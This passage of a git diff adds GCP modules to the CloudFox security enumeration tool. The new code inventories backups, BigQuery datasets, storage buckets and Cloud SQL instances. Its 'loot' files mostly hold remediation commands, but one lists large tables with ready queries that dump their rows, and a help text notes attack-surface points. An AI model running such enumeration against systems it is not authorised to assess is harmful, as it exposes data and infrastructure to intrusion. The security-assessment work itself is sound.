sqlService.BackupRuns.List(projectID, instance.Name).Do() + if err != nil { + continue + } + + var latestBackup *SQLBackup + backupCount := 0 + + for _, backup := range backups.Items { + sqlBackup := SQLBackup{ + InstanceName: instance.Name, + ProjectID: projectID, + BackupID: fmt.Sprintf("%d", backup.Id), + Status: backup.Status, + Type: backup.Type, + StartTime: backup.StartTime, + EndTime: backup.EndTime, + WindowStartTim: backup.WindowStartTime, + Location: backup.Location, + } + + m.mu.Lock() + m.SQLBackups = append(m.SQLBackups, sqlBackup) + m.mu.Unlock() + + backupCount++ + if latestBackup == nil || backup.StartTime > latestBackup.StartTime { + latestBackup = &sqlBackup + } + } + + // Add as protected resource + if backupCount > 0 { + protected := ProtectedResource{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "cloudsql-instance", + BackupType: "automated", + BackupCount: backupCount, + RetentionDays: retentionDays, + PITREnabled: pitrEnabled, + } + + if latestBackup != nil { + protected.LastBackup = latestBackup.StartTime + protected.BackupStatus = latestBackup.Status + protected.BackupLocation = latestBackup.Location + } + + m.mu.Lock() + m.ProtectedResources = append(m.ProtectedResources, protected) + m.mu.Unlock() + } + } +} + +// ------------------------------ +// Gap Analysis +// ------------------------------ +func (m *BackupInventoryModule) identifyUnprotectedResources(logger internal.Logger) { + m.mu.Lock() + defer m.mu.Unlock() + + // Find disks without snapshots + for diskURL, sizeGB := range m.allDisks { + if !m.disksWithBackups[diskURL] { + diskName := m.extractDiskName(diskURL) + projectID := m.extractProjectFromURL(diskURL) + + unprotected := UnprotectedResource{ + Name: diskName, + ProjectID: projectID, + ResourceType: "compute-disk", + Location: m.extractZoneFromURL(diskURL), + SizeGB: sizeGB, + RiskLevel: "HIGH", + Reason: "No snapshot backup found", + Remediation: fmt.Sprintf("Create snapshot schedule: gcloud compute resource-policies create snapshot-schedule %s-backup --project=%s --region=REGION --max-retention-days=30 --daily-schedule", diskName, projectID), + } + + // Higher risk for larger disks + if sizeGB > 500 { + unprotected.RiskLevel = "CRITICAL" + } + + m.UnprotectedResources = append(m.UnprotectedResources, unprotected) + + // Add to loot + m.LootMap["unprotected-vms"].Contents += fmt.Sprintf( + "%s (%s) - %dGB - %s\n", + diskName, projectID, sizeGB, unprotected.Reason, + ) + } + } + + // Find SQL instances without backups + for instanceName := range m.allSQLInstances { + if !m.sqlWithBackups[instanceName] { + unprotected := UnprotectedResource{ + Name: instanceName, + ResourceType: "cloudsql-instance", + RiskLevel: "CRITICAL", + Reason: "Automated backups not enabled", + Remediation: fmt.Sprintf("gcloud sql instances patch %s --backup-start-time=02:00 --enable-bin-log", instanceName), + } + + m.UnprotectedResources = append(m.UnprotectedResources, unprotected) + + m.LootMap["unprotected-vms"].Contents += fmt.Sprintf( + "%s (Cloud SQL) - %s\n", + instanceName, unprotected.Reason, + ) + } + } + + // Check for short retention policies + for _, policy := range m.BackupPolicies { + if policy.RetentionDays > 0 && policy.RetentionDays < 7 { + m.LootMap["short-retention"].Contents += fmt.Sprintf( + "%s (%s) - %d days retention (recommended: 30+ days)\n", + policy.Name, policy.ResourceType, policy.RetentionDays, + ) + } + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *BackupInventoryModule) extractDiskName(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func (m *BackupInventoryModule) extractProjectFromURL(url string) string { + if strings.Contains(url, "projects/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *BackupInventoryModule) extractZoneFromURL(url string) string { + if strings.Contains(url, "zones/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "zones" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *BackupInventoryModule) extractRegionFromURL(url string) string { + if strings.Contains(url, "regions/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return url +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *BackupInventoryModule) initializeLootFiles() { + m.LootMap["unprotected-vms"] = &internal.LootFile{ + Name: "unprotected-vms", + Contents: "# Unprotected VMs and Resources\n# Generated by CloudFox\n# These resources have no backup coverage!\n\n", + } + m.LootMap["short-retention"] = &internal.LootFile{ + Name: "short-retention", + Contents: "# Resources with Short Backup Retention\n# Generated by CloudFox\n\n", + } + m.LootMap["backup-commands"] = &internal.LootFile{ + Name: "backup-commands", + Contents: "# Backup Setup Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["backup-inventory"] = &internal.LootFile{ + Name: "backup-inventory", + Contents: "# Full Backup Inventory\n# Generated by CloudFox\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort protected resources by type and name + sort.Slice(m.ProtectedResources, func(i, j int) bool { + if m.ProtectedResources[i].ResourceType != m.ProtectedResources[j].ResourceType { + return m.ProtectedResources[i].ResourceType < m.ProtectedResources[j].ResourceType + } + return m.ProtectedResources[i].Name < m.ProtectedResources[j].Name + }) + + // Protected Resources table + protectedHeader := []string{ + "Resource", + "Project", + "Type", + "Backup Type", + "Last Backup", + "Count", + "Status", + "PITR", + } + + var protectedBody [][]string + for _, r := range m.ProtectedResources { + pitr := "No" + if r.PITREnabled { + pitr = "Yes" + } + + protectedBody = append(protectedBody, []string{ + r.Name, + r.ProjectID, + r.ResourceType, + r.BackupType, + truncateString(r.LastBackup, 20), + fmt.Sprintf("%d", r.BackupCount), + r.BackupStatus, + pitr, + }) + + // Add to inventory loot + m.LootMap["backup-inventory"].Contents += fmt.Sprintf( + "%s (%s) - %s - Last: %s - Count: %d\n", + r.Name, r.ResourceType, r.BackupType, r.LastBackup, r.BackupCount, + ) + } + + // Unprotected Resources table + unprotectedHeader := []string{ + "Resource", + "Project", + "Type", + "Location", + "Size (GB)", + "Risk", + "Reason", + } + + var unprotectedBody [][]string + for _, r := range m.UnprotectedResources { + unprotectedBody = append(unprotectedBody, []string{ + r.Name, + r.ProjectID, + r.ResourceType, + r.Location, + fmt.Sprintf("%d", r.SizeGB), + r.RiskLevel, + truncateString(r.Reason, 30), + }) + + // Add remediation to loot + m.LootMap["backup-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n%s\n\n", + r.Name, r.ResourceType, r.Remediation, + ) + } + + // Backup Policies table + policiesHeader := []string{ + "Policy", + "Project", + "Type", + "Schedule", + "Retention", + "Status", + } + + var policiesBody [][]string + for _, p := range m.BackupPolicies { + policiesBody = append(policiesBody, []string{ + p.Name, + p.ProjectID, + p.ResourceType, + p.Schedule, + fmt.Sprintf("%d days", p.RetentionDays), + p.Status, + }) + } + + // Snapshots table + snapshotsHeader := []string{ + "Snapshot", + "Project", + "Source Disk", + "Size (GB)", + "Created", + "Status", + } + + var snapshotsBody [][]string + for _, s := range m.Snapshots { + snapshotsBody = append(snapshotsBody, []string{ + s.Name, + s.ProjectID, + m.extractDiskName(s.SourceDisk), + fmt.Sprintf("%d", s.DiskSizeGB), + truncateString(s.CreationTime, 20), + s.Status, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{} + + if len(protectedBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "protected-resources", + Header: protectedHeader, + Body: protectedBody, + }) + } + + if len(unprotectedBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "unprotected-resources", + Header: unprotectedHeader, + Body: unprotectedBody, + }) + } + + if len(policiesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "backup-policies", + Header: policiesHeader, + Body: policiesBody, + }) + } + + if len(snapshotsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "snapshots", + Header: snapshotsHeader, + Body: snapshotsBody, + }) + } + + output := BackupInventoryOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/bigquery.go b/gcp/commands/bigquery.go index 809f2e3a..27b315f6 100644 --- a/gcp/commands/bigquery.go +++ b/gcp/commands/bigquery.go @@ -161,6 +161,26 @@ func (m *BigQueryModule) initializeLootFiles() { Name: "bigquery-access-bindings", Contents: "# GCP BigQuery Dataset Access Bindings\n# Generated by CloudFox\n\n", } + m.LootMap["bigquery-views"] = &internal.LootFile{ + Name: "bigquery-views", + Contents: "# GCP BigQuery Views\n# Generated by CloudFox\n# Views may expose data from other datasets\n\n", + } + m.LootMap["bigquery-google-managed-encryption"] = &internal.LootFile{ + Name: "bigquery-google-managed-encryption", + Contents: "# Datasets Using Google-Managed Encryption\n# Generated by CloudFox\n# Consider CMEK for compliance requirements\n\n", + } + m.LootMap["bigquery-cmek"] = &internal.LootFile{ + Name: "bigquery-cmek", + Contents: "# Datasets Using CMEK (Customer-Managed Encryption Keys)\n# Generated by CloudFox\n\n", + } + m.LootMap["bigquery-security-recommendations"] = &internal.LootFile{ + Name: "bigquery-security-recommendations", + Contents: "# BigQuery Security Recommendations\n# Generated by CloudFox\n# Remediation commands for security issues\n\n", + } + m.LootMap["bigquery-large-tables"] = &internal.LootFile{ + Name: "bigquery-large-tables", + Contents: "# Large BigQuery Tables (>1GB)\n# Generated by CloudFox\n# These tables may contain significant data\n\n", + } } func (m *BigQueryModule) addDatasetToLoot(dataset BigQueryService.BigqueryDataset) { @@ -212,6 +232,67 @@ func (m *BigQueryModule) addDatasetToLoot(dataset BigQueryService.BigqueryDatase } m.LootMap["bigquery-access-bindings"].Contents += "\n" } + + // Encryption status + if dataset.EncryptionType == "Google-managed" || dataset.EncryptionType == "" { + m.LootMap["bigquery-google-managed-encryption"].Contents += fmt.Sprintf( + "# DATASET: %s (Project: %s, Location: %s)\n"+ + "# Encryption: Google-managed\n"+ + "# Enable CMEK with:\n"+ + "bq update --destination_kms_key=projects/PROJECT/locations/LOCATION/keyRings/RING/cryptoKeys/KEY %s:%s\n\n", + dataset.DatasetID, dataset.ProjectID, dataset.Location, + dataset.ProjectID, dataset.DatasetID, + ) + } else if dataset.EncryptionType == "CMEK" { + m.LootMap["bigquery-cmek"].Contents += fmt.Sprintf( + "# DATASET: %s (Project: %s, Location: %s)\n"+ + "# Encryption: CMEK\n"+ + "# KMS Key: %s\n\n", + dataset.DatasetID, dataset.ProjectID, dataset.Location, dataset.KMSKeyName, + ) + } + + // Security recommendations + m.addDatasetSecurityRecommendations(dataset) +} + +// addDatasetSecurityRecommendations adds remediation commands for dataset security issues +func (m *BigQueryModule) addDatasetSecurityRecommendations(dataset BigQueryService.BigqueryDataset) { + hasRecommendations := false + recommendations := fmt.Sprintf( + "# DATASET: %s (Project: %s, Location: %s)\n", + dataset.DatasetID, dataset.ProjectID, dataset.Location, + ) + + // Public access + if dataset.IsPublic { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Public access (%s)\n"+ + "# Remove public access with:\n"+ + "bq show --format=prettyjson %s:%s > /tmp/acl.json\n"+ + "# Edit /tmp/acl.json to remove allUsers/allAuthenticatedUsers\n"+ + "bq update --source=/tmp/acl.json %s:%s\n\n", + dataset.PublicAccess, + dataset.ProjectID, dataset.DatasetID, + dataset.ProjectID, dataset.DatasetID, + ) + } + + // Google-managed encryption (consider CMEK) + if dataset.EncryptionType == "Google-managed" || dataset.EncryptionType == "" { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Using Google-managed encryption\n"+ + "# Enable CMEK with:\n"+ + "bq update --destination_kms_key=projects/PROJECT/locations/LOCATION/keyRings/RING/cryptoKeys/KEY %s:%s\n\n", + dataset.ProjectID, dataset.DatasetID, + ) + } + + if hasRecommendations { + m.LootMap["bigquery-security-recommendations"].Contents += recommendations + "\n" + } } func (m *BigQueryModule) addTableToLoot(table BigQueryService.BigqueryTable) { @@ -228,6 +309,44 @@ func (m *BigQueryModule) addTableToLoot(table BigQueryService.BigqueryTable) { table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, table.DatasetID, table.TableID, ) + + // Views (may expose data from other datasets) + if table.IsView { + viewQuery := table.ViewQuery + if len(viewQuery) > 200 { + viewQuery = viewQuery[:200] + "..." + } + m.LootMap["bigquery-views"].Contents += fmt.Sprintf( + "# VIEW: %s.%s (Project: %s)\n"+ + "# Type: %s\n"+ + "# Legacy SQL: %v\n"+ + "# Query:\n"+ + "# %s\n\n", + table.DatasetID, table.TableID, table.ProjectID, + table.TableType, + table.UseLegacySQL, + strings.ReplaceAll(viewQuery, "\n", "\n# "), + ) + } + + // Large tables (>1GB) + const oneGB = int64(1024 * 1024 * 1024) + if table.NumBytes > oneGB { + sizeGB := float64(table.NumBytes) / float64(oneGB) + m.LootMap["bigquery-large-tables"].Contents += fmt.Sprintf( + "# TABLE: %s.%s (Project: %s)\n"+ + "# Size: %.2f GB (%d bytes)\n"+ + "# Rows: %d\n"+ + "# Type: %s\n"+ + "# Query:\n"+ + "bq query --project_id=%s --use_legacy_sql=false 'SELECT * FROM `%s.%s.%s` LIMIT 1000'\n\n", + table.DatasetID, table.TableID, table.ProjectID, + sizeGB, table.NumBytes, + table.NumRows, + table.TableType, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, + ) + } } // ------------------------------ diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index 437b6459..28a2cb1e 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -175,6 +175,31 @@ func (m *BucketsModule) initializeLootFiles() { Name: "buckets-iam-bindings", Contents: "# GCP Bucket IAM Bindings\n# Generated by CloudFox\n\n", } + // New enhancement loot files + m.LootMap["buckets-no-versioning"] = &internal.LootFile{ + Name: "buckets-no-versioning", + Contents: "# GCP Buckets WITHOUT Object Versioning\n# These buckets have no protection against accidental deletion or overwrites\n# Generated by CloudFox\n\n", + } + m.LootMap["buckets-no-lifecycle"] = &internal.LootFile{ + Name: "buckets-no-lifecycle", + Contents: "# GCP Buckets WITHOUT Lifecycle Policies\n# These buckets may accumulate unnecessary data and costs\n# Generated by CloudFox\n\n", + } + m.LootMap["buckets-short-retention"] = &internal.LootFile{ + Name: "buckets-short-retention", + Contents: "# GCP Buckets with Short Delete Lifecycle (< 30 days)\n# Data may be deleted quickly - verify this is intentional\n# Generated by CloudFox\n\n", + } + m.LootMap["buckets-locked-retention"] = &internal.LootFile{ + Name: "buckets-locked-retention", + Contents: "# GCP Buckets with LOCKED Retention Policies\n# These buckets have immutable retention - data cannot be deleted before policy expires\n# Generated by CloudFox\n\n", + } + m.LootMap["buckets-dual-region"] = &internal.LootFile{ + Name: "buckets-dual-region", + Contents: "# GCP Buckets with Dual/Multi-Region Configuration\n# These buckets have built-in geo-redundancy\n# Generated by CloudFox\n\n", + } + m.LootMap["buckets-security-recommendations"] = &internal.LootFile{ + Name: "buckets-security-recommendations", + Contents: "# GCP Bucket Security Recommendations\n# Generated by CloudFox\n\n", + } } func (m *BucketsModule) addBucketToLoot(bucket CloudStorageService.BucketInfo) { @@ -252,6 +277,125 @@ func (m *BucketsModule) addBucketToLoot(bucket CloudStorageService.BucketInfo) { } m.LootMap["buckets-iam-bindings"].Contents += "\n" } + + // Enhancement: No versioning + if !bucket.VersioningEnabled { + m.LootMap["buckets-no-versioning"].Contents += fmt.Sprintf( + "gs://%s # Project: %s, Location: %s\n"+ + "# Enable versioning: gcloud storage buckets update gs://%s --versioning\n\n", + bucket.Name, bucket.ProjectID, bucket.Location, + bucket.Name, + ) + } + + // Enhancement: No lifecycle + if !bucket.LifecycleEnabled { + m.LootMap["buckets-no-lifecycle"].Contents += fmt.Sprintf( + "gs://%s # Project: %s, Location: %s\n"+ + "# Add lifecycle: gcloud storage buckets update gs://%s --lifecycle-file=lifecycle.json\n\n", + bucket.Name, bucket.ProjectID, bucket.Location, + bucket.Name, + ) + } + + // Enhancement: Short retention (delete lifecycle < 30 days) + if bucket.HasDeleteRule && bucket.ShortestDeleteDays > 0 && bucket.ShortestDeleteDays < 30 { + m.LootMap["buckets-short-retention"].Contents += fmt.Sprintf( + "gs://%s # Project: %s, Delete after: %d days\n", + bucket.Name, bucket.ProjectID, bucket.ShortestDeleteDays, + ) + } + + // Enhancement: Locked retention + if bucket.RetentionPolicyLocked { + m.LootMap["buckets-locked-retention"].Contents += fmt.Sprintf( + "gs://%s # Project: %s, Retention: %d days (LOCKED - IMMUTABLE)\n", + bucket.Name, bucket.ProjectID, bucket.RetentionPeriodDays, + ) + } + + // Enhancement: Dual/Multi-region + if bucket.LocationType == "dual-region" || bucket.LocationType == "multi-region" { + turboStatus := "" + if bucket.TurboReplication { + turboStatus = " (Turbo Replication ENABLED)" + } + m.LootMap["buckets-dual-region"].Contents += fmt.Sprintf( + "gs://%s # Project: %s, Type: %s, Location: %s%s\n", + bucket.Name, bucket.ProjectID, bucket.LocationType, bucket.Location, turboStatus, + ) + } + + // Add security recommendations + m.addBucketSecurityRecommendations(bucket) +} + +// addBucketSecurityRecommendations generates security recommendations for a bucket +func (m *BucketsModule) addBucketSecurityRecommendations(bucket CloudStorageService.BucketInfo) { + hasRecommendations := false + recommendations := fmt.Sprintf("# BUCKET: gs://%s (Project: %s)\n", bucket.Name, bucket.ProjectID) + + // Public access + if bucket.IsPublic { + hasRecommendations = true + recommendations += fmt.Sprintf("# [CRITICAL] Public access detected: %s\n", bucket.PublicAccess) + recommendations += fmt.Sprintf("# Remediation: Review and remove public access\n") + recommendations += fmt.Sprintf("gcloud storage buckets remove-iam-policy-binding gs://%s --member=allUsers --role=\n", bucket.Name) + recommendations += fmt.Sprintf("gcloud storage buckets remove-iam-policy-binding gs://%s --member=allAuthenticatedUsers --role=\n", bucket.Name) + } + + // No versioning + if !bucket.VersioningEnabled { + hasRecommendations = true + recommendations += "# [MEDIUM] Object versioning is disabled - no protection against accidental deletion\n" + recommendations += fmt.Sprintf("gcloud storage buckets update gs://%s --versioning\n", bucket.Name) + } + + // No lifecycle policy + if !bucket.LifecycleEnabled { + hasRecommendations = true + recommendations += "# [LOW] No lifecycle policy - may accumulate unnecessary data and costs\n" + recommendations += fmt.Sprintf("# Add lifecycle: gcloud storage buckets update gs://%s --lifecycle-file=lifecycle.json\n", bucket.Name) + } + + // Not uniform access (using ACLs) + if !bucket.UniformBucketLevelAccess { + hasRecommendations = true + recommendations += "# [MEDIUM] Not using uniform bucket-level access - ACLs are harder to audit\n" + recommendations += fmt.Sprintf("gcloud storage buckets update gs://%s --uniform-bucket-level-access\n", bucket.Name) + } + + // No logging + if !bucket.LoggingEnabled { + hasRecommendations = true + recommendations += "# [LOW] Access logging is disabled - no audit trail for bucket access\n" + recommendations += fmt.Sprintf("gcloud storage buckets update gs://%s --log-bucket= --log-object-prefix=%s\n", bucket.Name, bucket.Name) + } + + // Google-managed encryption (not CMEK) + if bucket.EncryptionType == "Google-managed" { + hasRecommendations = true + recommendations += "# [INFO] Using Google-managed encryption - consider CMEK for compliance requirements\n" + recommendations += fmt.Sprintf("gcloud storage buckets update gs://%s --default-encryption-key=projects//locations//keyRings//cryptoKeys/\n", bucket.Name) + } + + // Public access prevention not enforced + if bucket.PublicAccessPrevention != "enforced" { + hasRecommendations = true + recommendations += "# [MEDIUM] Public access prevention not enforced - bucket could be made public\n" + recommendations += fmt.Sprintf("gcloud storage buckets update gs://%s --public-access-prevention\n", bucket.Name) + } + + // No soft delete + if !bucket.SoftDeleteEnabled { + hasRecommendations = true + recommendations += "# [LOW] Soft delete not enabled - deleted objects cannot be recovered\n" + recommendations += fmt.Sprintf("gcloud storage buckets update gs://%s --soft-delete-duration=7d\n", bucket.Name) + } + + if hasRecommendations { + m.LootMap["buckets-security-recommendations"].Contents += recommendations + "\n" + } } // ------------------------------ @@ -309,13 +453,12 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) "Project ID", "Name", "Location", + "Type", "Public", - "PublicAccessPrevention", - "UniformAccess", "Versioning", - "Logging", - "Encryption", + "Lifecycle", "Retention", + "Encryption", } var body [][]string @@ -331,22 +474,77 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) } // Format public access - highlight if public - publicDisplay := bucket.PublicAccess + publicDisplay := "-" if bucket.IsPublic { - publicDisplay = "PUBLIC: " + bucket.PublicAccess + publicDisplay = "PUBLIC" + } + + // Format lifecycle info + lifecycleInfo := "-" + if bucket.LifecycleEnabled { + if bucket.HasDeleteRule { + lifecycleInfo = fmt.Sprintf("%d rules (del:%dd)", bucket.LifecycleRuleCount, bucket.ShortestDeleteDays) + } else { + lifecycleInfo = fmt.Sprintf("%d rules", bucket.LifecycleRuleCount) + } + } + + // Format location type + locationType := bucket.LocationType + if locationType == "" { + locationType = "region" + } + if bucket.TurboReplication { + locationType += "+turbo" } body = append(body, []string{ bucket.ProjectID, bucket.Name, bucket.Location, + locationType, publicDisplay, + boolToCheckMark(bucket.VersioningEnabled), + lifecycleInfo, + retentionInfo, + bucket.EncryptionType, + }) + } + + // Security config table + securityHeader := []string{ + "Bucket", + "Project ID", + "PublicAccessPrevention", + "UniformAccess", + "Logging", + "SoftDelete", + "Autoclass", + } + + var securityBody [][]string + for _, bucket := range m.Buckets { + softDeleteInfo := "-" + if bucket.SoftDeleteEnabled { + softDeleteInfo = fmt.Sprintf("%dd", bucket.SoftDeleteRetentionDays) + } + + autoclassInfo := "-" + if bucket.AutoclassEnabled { + autoclassInfo = bucket.AutoclassTerminalClass + if autoclassInfo == "" { + autoclassInfo = "enabled" + } + } + + securityBody = append(securityBody, []string{ + bucket.Name, + bucket.ProjectID, bucket.PublicAccessPrevention, boolToCheckMark(bucket.UniformBucketLevelAccess), - boolToCheckMark(bucket.VersioningEnabled), boolToCheckMark(bucket.LoggingEnabled), - bucket.EncryptionType, - retentionInfo, + softDeleteInfo, + autoclassInfo, }) } @@ -412,6 +610,11 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) Header: header, Body: body, }, + { + Name: "buckets-security-config", + Header: securityHeader, + Body: securityBody, + }, } // Add IAM table if there are bindings diff --git a/gcp/commands/cloudsql.go b/gcp/commands/cloudsql.go index ac906741..a241502c 100644 --- a/gcp/commands/cloudsql.go +++ b/gcp/commands/cloudsql.go @@ -25,6 +25,11 @@ Features: - Identifies publicly accessible databases - Shows SSL/TLS configuration and requirements - Checks backup and high availability configuration +- Shows encryption type (Google-managed vs CMEK) +- Shows IAM database authentication status +- Shows password policy configuration +- Shows maintenance window settings +- Shows point-in-time recovery status - Identifies common security misconfigurations - Generates gcloud commands for further analysis @@ -33,6 +38,10 @@ Security Columns: - RequireSSL: Whether SSL/TLS is required for connections - AuthNetworks: Number of authorized network ranges - Backups: Automated backup status +- PITR: Point-in-time recovery status +- Encryption: CMEK or Google-managed +- IAM Auth: IAM database authentication +- PwdPolicy: Password validation policy - HA: High availability configuration - Issues: Detected security misconfigurations @@ -40,7 +49,9 @@ Attack Surface: - Public IPs expose database to internet scanning - Missing SSL allows credential sniffing - 0.0.0.0/0 in authorized networks = world accessible -- Default service accounts may have excessive permissions`, +- Default service accounts may have excessive permissions +- Google-managed encryption may not meet compliance +- Missing password policy allows weak passwords`, Run: runGCPCloudSQLCommand, } @@ -168,6 +179,22 @@ func (m *CloudSQLModule) initializeLootFiles() { Name: "cloudsql-security-issues", Contents: "# Cloud SQL Security Issues Detected\n# Generated by CloudFox\n\n", } + m.LootMap["cloudsql-backup-commands"] = &internal.LootFile{ + Name: "cloudsql-backup-commands", + Contents: "# Cloud SQL Backup Commands\n# Generated by CloudFox\n# Commands for backup enumeration and restoration\n\n", + } + m.LootMap["cloudsql-security-recommendations"] = &internal.LootFile{ + Name: "cloudsql-security-recommendations", + Contents: "# Cloud SQL Security Recommendations\n# Generated by CloudFox\n# Remediation commands for security issues\n\n", + } + m.LootMap["cloudsql-no-backups"] = &internal.LootFile{ + Name: "cloudsql-no-backups", + Contents: "# Cloud SQL Instances WITHOUT Backups\n# Generated by CloudFox\n# CRITICAL: These instances have no automated backups!\n\n", + } + m.LootMap["cloudsql-weak-encryption"] = &internal.LootFile{ + Name: "cloudsql-weak-encryption", + Contents: "# Cloud SQL Instances Using Google-Managed Encryption\n# Generated by CloudFox\n# Consider using CMEK for compliance requirements\n\n", + } } func (m *CloudSQLModule) addInstanceToLoot(instance CloudSQLService.SQLInstanceInfo) { @@ -295,6 +322,144 @@ func (m *CloudSQLModule) addInstanceToLoot(instance CloudSQLService.SQLInstanceI } m.LootMap["cloudsql-security-issues"].Contents += "\n" } + + // Backup commands + m.LootMap["cloudsql-backup-commands"].Contents += fmt.Sprintf( + "# Instance: %s (Project: %s)\n"+ + "# Backup Enabled: %v, PITR: %v, Retention: %d days\n"+ + "gcloud sql backups list --instance=%s --project=%s\n"+ + "gcloud sql backups describe BACKUP_ID --instance=%s --project=%s\n"+ + "# Restore from backup:\n"+ + "# gcloud sql backups restore BACKUP_ID --restore-instance=%s --project=%s\n"+ + "# Point-in-time recovery (if enabled):\n"+ + "# gcloud sql instances clone %s %s-clone --point-in-time='2024-01-01T00:00:00Z' --project=%s\n\n", + instance.Name, instance.ProjectID, + instance.BackupEnabled, instance.PointInTimeRecovery, instance.RetentionDays, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.Name, instance.ProjectID, + ) + + // Instances without backups + if !instance.BackupEnabled { + m.LootMap["cloudsql-no-backups"].Contents += fmt.Sprintf( + "# INSTANCE: %s (Project: %s)\n"+ + "# Database: %s, Tier: %s\n"+ + "# CRITICAL: No automated backups configured!\n"+ + "# Enable backups with:\n"+ + "gcloud sql instances patch %s --backup-start-time=02:00 --project=%s\n\n", + instance.Name, instance.ProjectID, + instance.DatabaseVersion, instance.Tier, + instance.Name, instance.ProjectID, + ) + } + + // Weak encryption (Google-managed instead of CMEK) + if instance.EncryptionType == "Google-managed" { + m.LootMap["cloudsql-weak-encryption"].Contents += fmt.Sprintf( + "# INSTANCE: %s (Project: %s)\n"+ + "# Database: %s\n"+ + "# Encryption: Google-managed (not CMEK)\n"+ + "# NOTE: CMEK cannot be enabled on existing instances.\n"+ + "# For CMEK, create a new instance with:\n"+ + "# gcloud sql instances create %s-cmek \\\n"+ + "# --database-version=%s \\\n"+ + "# --disk-encryption-key=projects/PROJECT/locations/LOCATION/keyRings/RING/cryptoKeys/KEY \\\n"+ + "# --project=%s\n\n", + instance.Name, instance.ProjectID, + instance.DatabaseVersion, + instance.Name, + instance.DatabaseVersion, + instance.ProjectID, + ) + } + + // Security recommendations + m.addSecurityRecommendations(instance) +} + +// addSecurityRecommendations adds remediation commands for security issues +func (m *CloudSQLModule) addSecurityRecommendations(instance CloudSQLService.SQLInstanceInfo) { + hasRecommendations := false + recommendations := fmt.Sprintf( + "# INSTANCE: %s (Project: %s)\n"+ + "# Database: %s\n", + instance.Name, instance.ProjectID, instance.DatabaseVersion, + ) + + // SSL not required + if !instance.RequireSSL { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: SSL not required\n"+ + "gcloud sql instances patch %s --require-ssl --project=%s\n\n", + instance.Name, instance.ProjectID, + ) + } + + // Password policy not enabled + if !instance.PasswordPolicyEnabled { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Password policy not enabled\n"+ + "gcloud sql instances patch %s \\\n"+ + " --password-policy-min-length=12 \\\n"+ + " --password-policy-complexity=COMPLEXITY_DEFAULT \\\n"+ + " --password-policy-reuse-interval=5 \\\n"+ + " --password-policy-disallow-username-substring \\\n"+ + " --project=%s\n\n", + instance.Name, instance.ProjectID, + ) + } + + // Backups not enabled + if !instance.BackupEnabled { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Automated backups not enabled\n"+ + "gcloud sql instances patch %s --backup-start-time=02:00 --project=%s\n\n", + instance.Name, instance.ProjectID, + ) + } + + // Point-in-time recovery not enabled (but backups are) + if instance.BackupEnabled && !instance.PointInTimeRecovery { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Point-in-time recovery not enabled\n"+ + "gcloud sql instances patch %s --enable-point-in-time-recovery --project=%s\n\n", + instance.Name, instance.ProjectID, + ) + } + + // Single zone deployment + if instance.AvailabilityType == "ZONAL" { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Single zone deployment (no HA)\n"+ + "gcloud sql instances patch %s --availability-type=REGIONAL --project=%s\n\n", + instance.Name, instance.ProjectID, + ) + } + + // Public IP with no SSL + if instance.HasPublicIP && !instance.RequireSSL { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Public IP without SSL requirement - HIGH RISK\n"+ + "# Option 1: Require SSL\n"+ + "gcloud sql instances patch %s --require-ssl --project=%s\n"+ + "# Option 2: Disable public IP (use Private IP only)\n"+ + "gcloud sql instances patch %s --no-assign-ip --project=%s\n\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + ) + } + + if hasRecommendations { + m.LootMap["cloudsql-security-recommendations"].Contents += recommendations + "\n" + } } // getDatabaseType returns the database type from version string @@ -315,7 +480,7 @@ func getDatabaseType(version string) string { // Output Generation // ------------------------------ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main instances table + // Main instances table with enhanced columns header := []string{ "Project ID", "Name", @@ 